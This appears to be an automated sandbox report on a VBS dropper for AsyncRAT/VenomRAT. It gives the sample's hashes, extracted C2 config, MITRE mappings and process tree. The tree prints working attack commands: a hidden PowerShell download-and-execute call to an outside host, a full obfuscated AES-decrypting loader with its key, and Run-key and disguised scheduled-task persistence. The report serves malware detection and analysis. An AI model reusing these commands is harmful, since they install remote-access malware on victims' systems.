asyncrat | b736623441dcad195ea6687281e8ead850c5b1c690d896f1d942abd52e1a86a5

Analysis

max time kernel
148s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
13-12-2024 03:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b736623441dcad195ea6687281e8ead850c5b1c690d896f1d942abd52e1a86a5.vbs
Size

67KB
MD5

0eccd58bd629893c13a11881a4707538
SHA1

0c6eb5b4ca3e92c44ea8b8e9d0841189aeb7d554
SHA256

b736623441dcad195ea6687281e8ead850c5b1c690d896f1d942abd52e1a86a5
SHA512

25a8c044df81bd1e953922f897616eacb615e68e1a0e33d7606c1f4f42913c62826090e5ac4d9a7a62c20284c7206182df3b9999b7704aed692d7933015608b8
SSDEEP

1536:hvakp9tDsWXM2yd+DeYq4Vi5QBCOXU3T18Foc:tJTZrXw+i++cCOXAjc

Score

10^/10

asyncrat venomrat py 2024 discovery execution persistence rat

Malware Config

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

py 2024

45.88.88.7:6987

Mutex

vojifcrudluxshc

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

VenomRAT 2 IoCs

Detects VenomRAT.

rat

resource	yara_rule
behavioral2/files/0x000c000000023ca7-118.dat	VenomRAT
behavioral2/memory/4892-125-0x0000000000380000-0x0000000000398000-memory.dmp	VenomRAT

Venomrat family
venomrat

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral2/files/0x000c000000023ca7-118.dat	family_asyncrat

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1296	powershell.exe
3080	powershell.exe
232	powershell.exe
2240	powershell.exe
2896	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 1 IoCs

pid	Process
4892	avnuhruh.als.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MicrosoftService = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\system.bat\""	WScript.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
3580	timeout.exe

Suspicious behavior: EnumeratesProcesses 21 IoCs

pid	Process
2240	powershell.exe
2240	powershell.exe
3120	powershell.exe
3120	powershell.exe
2896	powershell.exe
2896	powershell.exe
4488	powershell.exe
4488	powershell.exe
1296	powershell.exe
1296	powershell.exe
4360	powershell.exe
4360	powershell.exe
3080	powershell.exe
3080	powershell.exe
2596	powershell.exe
2596	powershell.exe
232	powershell.exe
232	powershell.exe
4892	avnuhruh.als.exe
4892	avnuhruh.als.exe
4892	avnuhruh.als.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2240	powershell.exe
Token: SeDebugPrivilege	3120	powershell.exe
Token: SeDebugPrivilege	2896	powershell.exe
Token: SeDebugPrivilege	4488	powershell.exe
Token: SeIncreaseQuotaPrivilege	4488	powershell.exe
Token: SeSecurityPrivilege	4488	powershell.exe
Token: SeTakeOwnershipPrivilege	4488	powershell.exe
Token: SeLoadDriverPrivilege	4488	powershell.exe
Token: SeSystemProfilePrivilege	4488	powershell.exe
Token: SeSystemtimePrivilege	4488	powershell.exe
Token: SeProfSingleProcessPrivilege	4488	powershell.exe
Token: SeIncBasePriorityPrivilege	4488	powershell.exe
Token: SeCreatePagefilePrivilege	4488	powershell.exe
Token: SeBackupPrivilege	4488	powershell.exe
Token: SeRestorePrivilege	4488	powershell.exe
Token: SeShutdownPrivilege	4488	powershell.exe
Token: SeDebugPrivilege	4488	powershell.exe
Token: SeSystemEnvironmentPrivilege	4488	powershell.exe
Token: SeRemoteShutdownPrivilege	4488	powershell.exe
Token: SeUndockPrivilege	4488	powershell.exe
Token: SeManageVolumePrivilege	4488	powershell.exe
Token: 33	4488	powershell.exe
Token: 34	4488	powershell.exe
Token: 35	4488	powershell.exe
Token: 36	4488	powershell.exe
Token: SeDebugPrivilege	1296	powershell.exe
Token: SeIncreaseQuotaPrivilege	1296	powershell.exe
Token: SeSecurityPrivilege	1296	powershell.exe
Token: SeTakeOwnershipPrivilege	1296	powershell.exe
Token: SeLoadDriverPrivilege	1296	powershell.exe
Token: SeSystemProfilePrivilege	1296	powershell.exe
Token: SeSystemtimePrivilege	1296	powershell.exe
Token: SeProfSingleProcessPrivilege	1296	powershell.exe
Token: SeIncBasePriorityPrivilege	1296	powershell.exe
Token: SeCreatePagefilePrivilege	1296	powershell.exe
Token: SeBackupPrivilege	1296	powershell.exe
Token: SeRestorePrivilege	1296	powershell.exe
Token: SeShutdownPrivilege	1296	powershell.exe
Token: SeDebugPrivilege	1296	powershell.exe
Token: SeSystemEnvironmentPrivilege	1296	powershell.exe
Token: SeRemoteShutdownPrivilege	1296	powershell.exe
Token: SeUndockPrivilege	1296	powershell.exe
Token: SeManageVolumePrivilege	1296	powershell.exe
Token: 33	1296	powershell.exe
Token: 34	1296	powershell.exe
Token: 35	1296	powershell.exe
Token: 36	1296	powershell.exe
Token: SeIncreaseQuotaPrivilege	1296	powershell.exe
Token: SeSecurityPrivilege	1296	powershell.exe
Token: SeTakeOwnershipPrivilege	1296	powershell.exe
Token: SeLoadDriverPrivilege	1296	powershell.exe
Token: SeSystemProfilePrivilege	1296	powershell.exe
Token: SeSystemtimePrivilege	1296	powershell.exe
Token: SeProfSingleProcessPrivilege	1296	powershell.exe
Token: SeIncBasePriorityPrivilege	1296	powershell.exe
Token: SeCreatePagefilePrivilege	1296	powershell.exe
Token: SeBackupPrivilege	1296	powershell.exe
Token: SeRestorePrivilege	1296	powershell.exe
Token: SeShutdownPrivilege	1296	powershell.exe
Token: SeDebugPrivilege	1296	powershell.exe
Token: SeSystemEnvironmentPrivilege	1296	powershell.exe
Token: SeRemoteShutdownPrivilege	1296	powershell.exe
Token: SeUndockPrivilege	1296	powershell.exe
Token: SeManageVolumePrivilege	1296	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4892	avnuhruh.als.exe

Suspicious use of WriteProcessMemory 34 IoCs

description	pid	Process	procid_target
PID 4668 wrote to memory of 2240	4668	WScript.exe	83
PID 4668 wrote to memory of 2240	4668	WScript.exe	83
PID 4668 wrote to memory of 2756	4668	WScript.exe	100
PID 4668 wrote to memory of 2756	4668	WScript.exe	100
PID 2756 wrote to memory of 3060	2756	cmd.exe	102
PID 2756 wrote to memory of 3060	2756	cmd.exe	102
PID 3060 wrote to memory of 3508	3060	cmd.exe	104
PID 3060 wrote to memory of 3508	3060	cmd.exe	104
PID 3060 wrote to memory of 3120	3060	cmd.exe	105
PID 3060 wrote to memory of 3120	3060	cmd.exe	105
PID 3120 wrote to memory of 2896	3120	powershell.exe	106
PID 3120 wrote to memory of 2896	3120	powershell.exe	106
PID 3120 wrote to memory of 4488	3120	powershell.exe	107
PID 3120 wrote to memory of 4488	3120	powershell.exe	107
PID 3120 wrote to memory of 1296	3120	powershell.exe	110
PID 3120 wrote to memory of 1296	3120	powershell.exe	110
PID 3120 wrote to memory of 4876	3120	powershell.exe	112
PID 3120 wrote to memory of 4876	3120	powershell.exe	112
PID 4876 wrote to memory of 3632	4876	cmd.exe	114
PID 4876 wrote to memory of 3632	4876	cmd.exe	114
PID 3632 wrote to memory of 3300	3632	cmd.exe	116
PID 3632 wrote to memory of 3300	3632	cmd.exe	116
PID 3632 wrote to memory of 4360	3632	cmd.exe	117
PID 3632 wrote to memory of 4360	3632	cmd.exe	117
PID 4360 wrote to memory of 3080	4360	powershell.exe	118
PID 4360 wrote to memory of 3080	4360	powershell.exe	118
PID 4360 wrote to memory of 2596	4360	powershell.exe	119
PID 4360 wrote to memory of 2596	4360	powershell.exe	119
PID 3060 wrote to memory of 3580	3060	cmd.exe	121
PID 3060 wrote to memory of 3580	3060	cmd.exe	121
PID 4360 wrote to memory of 232	4360	powershell.exe	122
PID 4360 wrote to memory of 232	4360	powershell.exe	122
PID 4360 wrote to memory of 4892	4360	powershell.exe	124
PID 4360 wrote to memory of 4892	4360	powershell.exe	124

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b736623441dcad195ea6687281e8ead850c5b1c690d896f1d942abd52e1a86a5.vbs"
1⤵
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4668
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri https://emptyservices.xyz/vbs.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2240
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\system.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\system.bat"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3060
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\system.bat';$jPKW='GefLjTtCufLjTrrfLjTentfLjTPrfLjTocfLjTefLjTsfLjTsfLjT'.Replace('fLjT', ''),'DGzhvecoGzhvmGzhvprGzhvesGzhvsGzhv'.Replace('Gzhv', ''),'TrwGpvanwGpvsfwGpvormwGpvFiwGpvnalwGpvBwGpvlowGpvcwGpvkwGpv'.Replace('wGpv', ''),'FrycyWomBycyWaycyWseycyW64ycyWStycyWrinycyWgycyW'.Replace('ycyW', ''),'LOfFmoOfFmadOfFm'.Replace('OfFm', ''),'ElekvoVmekvoVntkvoVAtkvoV'.Replace('kvoV', ''),'MauFSCinMuFSCoduFSCuuFSCluFSCeuFSC'.Replace('uFSC', ''),'CsxmfosxmfpysxmfTosxmf'.Replace('sxmf', ''),'IunLTnvunLTokunLTeunLT'.Replace('unLT', ''),'CreuAMJateuAMJDuAMJecuAMJrypuAMJtouAMJruAMJ'.Replace('uAMJ', ''),'EfIGrntfIGrryfIGrPoifIGrnfIGrtfIGr'.Replace('fIGr', ''),'RedTRKaddTRKLdTRKinedTRKsdTRK'.Replace('dTRK', ''),'CpvtehapvtengepvteExpvtetepvtensipvteonpvte'.Replace('pvte', ''),'SGeUwplGeUwitGeUw'.Replace('GeUw', '');powershell -w hidden;function KFqPw($gImbJ){$prorq=[System.Security.Cryptography.Aes]::Create();$prorq.Mode=[System.Security.Cryptography.CipherMode]::CBC;$prorq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$prorq.Key=[System.Convert]::($jPKW[3])('S1WcM0oi7s1GQUenmEkEPvh6XGAuOA7dB1XSNaO25Eg=');$prorq.IV=[System.Convert]::($jPKW[3])('P2P4FP+QooR5iPseDFqb+g==');$ZXSvs=$prorq.($jPKW[9])();$lcuYL=$ZXSvs.($jPKW[2])($gImbJ,0,$gImbJ.Length);$ZXSvs.Dispose();$prorq.Dispose();$lcuYL;}function aFmgm($gImbJ){$Irchl=New-Object System.IO.MemoryStream(,$gImbJ);$Ylnvr=New-Object System.IO.MemoryStream;$DuOhJ=New-Object System.IO.Compression.GZipStream($Irchl,[IO.Compression.CompressionMode]::($jPKW[1]));$DuOhJ.($jPKW[7])($Ylnvr);$DuOhJ.Dispose();$Irchl.Dispose();$Ylnvr.Dispose();$Ylnvr.ToArray();}$VZjzI=[System.IO.File]::($jPKW[11])([Console]::Title);$UwubA=aFmgm (KFqPw ([Convert]::($jPKW[3])([System.Linq.Enumerable]::($jPKW[5])($VZjzI, 5).Substring(2))));$hRlCy=aFmgm (KFqPw ([Convert]::($jPKW[3])([System.Linq.Enumerable]::($jPKW[5])($VZjzI, 6).Substring(2))));[System.Reflection.Assembly]::($jPKW[4])([byte[]]$hRlCy).($jPKW[10]).($jPKW[8])($null,$null);[System.Reflection.Assembly]::($jPKW[4])([byte[]]$UwubA).($jPKW[10]).($jPKW[8])($null,$null); "
      4⤵
      PID:3508
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3120
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2896
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\system')
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4488
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 12168' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network12168Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1296
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\Network12168Man.cmd"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4876
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Network12168Man.cmd"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:3632
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Network12168Man.cmd';$jPKW='GefLjTtCufLjTrrfLjTentfLjTPrfLjTocfLjTefLjTsfLjTsfLjT'.Replace('fLjT', ''),'DGzhvecoGzhvmGzhvprGzhvesGzhvsGzhv'.Replace('Gzhv', ''),'TrwGpvanwGpvsfwGpvormwGpvFiwGpvnalwGpvBwGpvlowGpvcwGpvkwGpv'.Replace('wGpv', ''),'FrycyWomBycyWaycyWseycyW64ycyWStycyWrinycyWgycyW'.Replace('ycyW', ''),'LOfFmoOfFmadOfFm'.Replace('OfFm', ''),'ElekvoVmekvoVntkvoVAtkvoV'.Replace('kvoV', ''),'MauFSCinMuFSCoduFSCuuFSCluFSCeuFSC'.Replace('uFSC', ''),'CsxmfosxmfpysxmfTosxmf'.Replace('sxmf', ''),'IunLTnvunLTokunLTeunLT'.Replace('unLT', ''),'CreuAMJateuAMJDuAMJecuAMJrypuAMJtouAMJruAMJ'.Replace('uAMJ', ''),'EfIGrntfIGrryfIGrPoifIGrnfIGrtfIGr'.Replace('fIGr', ''),'RedTRKaddTRKLdTRKinedTRKsdTRK'.Replace('dTRK', ''),'CpvtehapvtengepvteExpvtetepvtensipvteonpvte'.Replace('pvte', ''),'SGeUwplGeUwitGeUw'.Replace('GeUw', '');powershell -w hidden;function KFqPw($gImbJ){$prorq=[System.Security.Cryptography.Aes]::Create();$prorq.Mode=[System.Security.Cryptography.CipherMode]::CBC;$prorq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$prorq.Key=[System.Convert]::($jPKW[3])('S1WcM0oi7s1GQUenmEkEPvh6XGAuOA7dB1XSNaO25Eg=');$prorq.IV=[System.Convert]::($jPKW[3])('P2P4FP+QooR5iPseDFqb+g==');$ZXSvs=$prorq.($jPKW[9])();$lcuYL=$ZXSvs.($jPKW[2])($gImbJ,0,$gImbJ.Length);$ZXSvs.Dispose();$prorq.Dispose();$lcuYL;}function aFmgm($gImbJ){$Irchl=New-Object System.IO.MemoryStream(,$gImbJ);$Ylnvr=New-Object System.IO.MemoryStream;$DuOhJ=New-Object System.IO.Compression.GZipStream($Irchl,[IO.Compression.CompressionMode]::($jPKW[1]));$DuOhJ.($jPKW[7])($Ylnvr);$DuOhJ.Dispose();$Irchl.Dispose();$Ylnvr.Dispose();$Ylnvr.ToArray();}$VZjzI=[System.IO.File]::($jPKW[11])([Console]::Title);$UwubA=aFmgm (KFqPw ([Convert]::($jPKW[3])([System.Linq.Enumerable]::($jPKW[5])($VZjzI, 5).Substring(2))));$hRlCy=aFmgm (KFqPw ([Convert]::($jPKW[3])([System.Linq.Enumerable]::($jPKW[5])($VZjzI, 6).Substring(2))));[System.Reflection.Assembly]::($jPKW[4])([byte[]]$hRlCy).($jPKW[10]).($jPKW[8])($null,$null);[System.Reflection.Assembly]::($jPKW[4])([byte[]]$UwubA).($jPKW[10]).($jPKW[8])($null,$null); "
        7⤵
        
        PID:3300
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        7⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:4360
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3080
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\Network12168Man')
        8⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2596
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 12168' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network12168Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:232
        
        C:\Users\Admin\AppData\Local\Temp\avnuhruh.als.exe
        
        "C:\Users\Admin\AppData\Local\Temp\avnuhruh.als.exe"
        8⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:4892
  - - C:\Windows\system32\timeout.exe
      timeout /nobreak /t 1
      4⤵
      Delays execution with timeout.exe
      PID:3580

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
e4de99c1795fd54aa87da05fa39c199c

SHA1
dfaaac2de1490fae01104f0a6853a9d8fe39a9d7

SHA256
23c35f4fcd9f110592d3ff34490e261efbcf6c73aa753887479197fd15289457

SHA512
796b6d3f7b9a336bc347eae8fb11cdbf2ae2ad73aae58de79e096c3ad57bd45eadddae445a95c4ee7452554568d7ab55b0307972b24e2ff75eae4a098ba9e926

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b16026237f16e3cc967f8e433e94ea4a

SHA1
29f643696a090e5c57ee6bf74c341d7e2fd05aab

SHA256
02c5c2d3e3e1d7e1210640b7cde1bd090f1ac2f3e5727398ac31a6f6bfc93117

SHA512
5f4582b2df981dd391189811583485a33c8967a8e400ad2511ef7364cd449ce1d3ea6ff20b2e562eb66c65178737d60d83eab3d4af89eb6acec658258747963f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
207c0e6a19a298ef489d68c0976557b9

SHA1
31059fa44a4d7084add0f148cd7c09fb42f3d625

SHA256
153a84eae98d1a744e4c24b3eabab21cae076421fc3e229c3fe88b9f00f1b590

SHA512
193b660611436fc009192d111917072ec07474471b87bb274990913b45d3dc3e6efe222b1ab9a483015d83f6b49b70bb00ba0b1b8528289d4ecdec65507281cd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
abc27673d9c940ad74b41c58391d2412

SHA1
9a31a521a521dcd0f974ce6f7a50aecc69a50df0

SHA256
cb3f2adb2f5e39fbe5ae3c49837d9074a85f21e9be7eb8404444611f78a08357

SHA512
c7a574f9a53d29e2212500eb48fb05f475bac1e21b858f58e0e441caabea760ba7b7425a98610bf91e66d662f70a91c210b522bbecad3f5180e1aedbf6cfcdc4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
96702b1a99b778635b440cbc88c868f4

SHA1
4aa59f634a417fc7c0df6825d87316a85d61a50c

SHA256
7e7ea491fa167a8c1cceb7e7e4e4d596f820bf3aad67142d7b9767e97525b173

SHA512
f47e5d2afc4338240655a2c44f59710721ee7ab02f6879cc01051a88cdcd1ef8a09048da8b5c100e4007b5bc3e302d0be3f6a559e21922004dea5751e69be132

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_plfqhyph.g4v.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\avnuhruh.als.exe

Filesize
74KB

MD5
d727c2421ba70ad5cceaf025cc37655c

SHA1
dc1414aa601f356f058fd07a991aba651147dea1

SHA256
2b1bd21d22d83db31ce0270318e21691483280faf580840c9157388a785c08a8

SHA512
7788d7ee677006e5a19084618dbfb7d9661d236368e903dddd277f3e44c729cd921bab0737409fab277f58b15f904bd12dfc60901c39b62a84a3434355d22046

Download Submit
C:\Users\Admin\AppData\Local\Temp\system.bat

Filesize
66KB

MD5
c1cffa7be0703f50d79684e9ec4c9069

SHA1
e359431db8731b7e5966463906d6e24df8515744

SHA256
298ce1e8c043395147512b3c7f6e99b2bbfea09fd3c53a4fb34e5f384457f682

SHA512
6eece0756aaf8a65b4a425329a9d0ec0d46f2ae4d13439a453c279560ccda356a24ac501cd4b55570e2caf0dec732ed51ddb69f71cdea936d0052fa9666d258c

Download Submit
memory/2240-13-0x00007FFF98C70000-0x00007FFF99731000-memory.dmp

Filesize
10.8MB

Download
memory/2240-17-0x00007FFF98C70000-0x00007FFF99731000-memory.dmp

Filesize
10.8MB

Download
memory/2240-14-0x00007FFF98C70000-0x00007FFF99731000-memory.dmp

Filesize
10.8MB

Download
memory/2240-0-0x00007FFF98C73000-0x00007FFF98C75000-memory.dmp

Filesize
8KB

Download
memory/2240-12-0x00007FFF98C70000-0x00007FFF99731000-memory.dmp

Filesize
10.8MB

Download
memory/2240-11-0x00007FFF98C70000-0x00007FFF99731000-memory.dmp

Filesize
10.8MB

Download
memory/2240-1-0x000001F073E30000-0x000001F073E52000-memory.dmp

Filesize
136KB

Download
memory/3120-32-0x000001D1C83C0000-0x000001D1C8404000-memory.dmp

Filesize
272KB

Download
memory/3120-33-0x000001D1C8490000-0x000001D1C8506000-memory.dmp

Filesize
472KB

Download
memory/3120-44-0x000001D1C7710000-0x000001D1C7722000-memory.dmp

Filesize
72KB

Download
memory/4360-91-0x0000017F1C0B0000-0x0000017F1C0C2000-memory.dmp

Filesize
72KB

Download
memory/4892-125-0x0000000000380000-0x0000000000398000-memory.dmp

Filesize
96KB

Download